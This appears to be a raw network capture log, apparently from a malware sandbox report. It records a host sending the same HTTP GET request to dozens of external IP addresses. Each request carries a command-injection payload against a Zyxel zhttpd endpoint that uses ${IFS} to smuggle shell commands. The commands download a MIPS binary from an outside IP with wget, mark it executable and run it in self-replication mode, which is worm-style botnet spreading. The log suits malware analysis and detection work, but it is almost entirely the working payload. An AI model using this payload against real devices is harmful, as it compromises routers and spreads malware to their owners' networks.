                                        Jan 14, 2024 16:18:56.768126965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7752192.168.2.1358922155.33.22.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768203974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7753192.168.2.1359954107.146.6.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768275023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7754192.168.2.1344734152.42.17.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768316984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7755192.168.2.135927872.188.3.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768383980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7756192.168.2.135705867.244.85.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768497944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7757192.168.2.1347406205.6.237.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768497944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7758192.168.2.133622814.60.219.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768594027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7759192.168.2.133282045.232.118.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768599987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7760192.168.2.1350646177.243.214.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768675089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7761192.168.2.1344278191.247.113.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768759012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7762192.168.2.1352696206.167.23.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768826962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7763192.168.2.135125495.3.158.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768889904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7764192.168.2.134593668.193.58.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768948078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7765192.168.2.1353614164.44.52.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769006968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7766192.168.2.1346948140.231.47.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769053936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7767192.168.2.1356464211.67.128.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769093037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7768192.168.2.13580761.94.203.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769140005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7769192.168.2.134858247.120.232.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769201994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7770192.168.2.135112063.103.156.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769256115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7771192.168.2.1353922120.21.75.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769326925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7772192.168.2.134676659.85.162.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769382954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7773192.168.2.135354890.98.211.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769443035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7774192.168.2.135894679.20.177.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769488096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7775192.168.2.135043648.207.112.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769567966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7776192.168.2.1332946134.191.220.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769622087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7777192.168.2.1357230150.199.206.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769664049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7778192.168.2.135889639.68.174.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769718885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7779192.168.2.13540549.86.29.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769820929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7780192.168.2.135219017.145.94.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769874096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7781192.168.2.1337030109.178.97.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769912004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7782192.168.2.1346054188.234.28.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.769979954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7783192.168.2.1338952194.205.229.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770024061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7784192.168.2.1345114159.192.229.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770072937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7785192.168.2.1360266151.202.248.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770119905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7786192.168.2.133612248.4.123.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770180941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7787192.168.2.13412749.44.27.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770239115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7788192.168.2.1347630121.253.117.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770296097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7789192.168.2.1336456196.109.229.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770349979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7790192.168.2.1352828183.200.203.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770407915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7791192.168.2.1336520175.164.77.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770473957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7792192.168.2.134792895.161.239.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770538092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7793192.168.2.1353586173.47.230.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770596027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7794192.168.2.135902867.99.98.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770646095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7795192.168.2.1334270171.65.166.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770695925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7796192.168.2.135270687.25.184.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770776987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7797192.168.2.1344434211.106.132.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770857096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7798192.168.2.1354604206.24.51.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770908117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7799192.168.2.1358420223.128.80.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.770937920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7800192.168.2.134239259.206.193.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771002054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7801192.168.2.133591818.156.16.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771061897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7802192.168.2.1359406158.246.158.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771152973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7803192.168.2.1343390107.28.205.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771169901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7804192.168.2.135362442.4.72.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771234035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7805192.168.2.1333212103.75.208.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771286964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7806192.168.2.1357088132.202.95.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771333933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7807192.168.2.1355898189.52.162.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771359921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7808192.168.2.134655869.85.230.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771435022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7809192.168.2.1339222220.27.70.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771482944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7810192.168.2.135357073.67.30.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771562099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7811192.168.2.134152069.18.42.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771627903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7812192.168.2.133483095.102.84.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771692038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7813192.168.2.1335272116.131.76.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.771728039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7814192.168.2.13364245.158.190.50443
                                        TimestampBytes transferredDirectionData
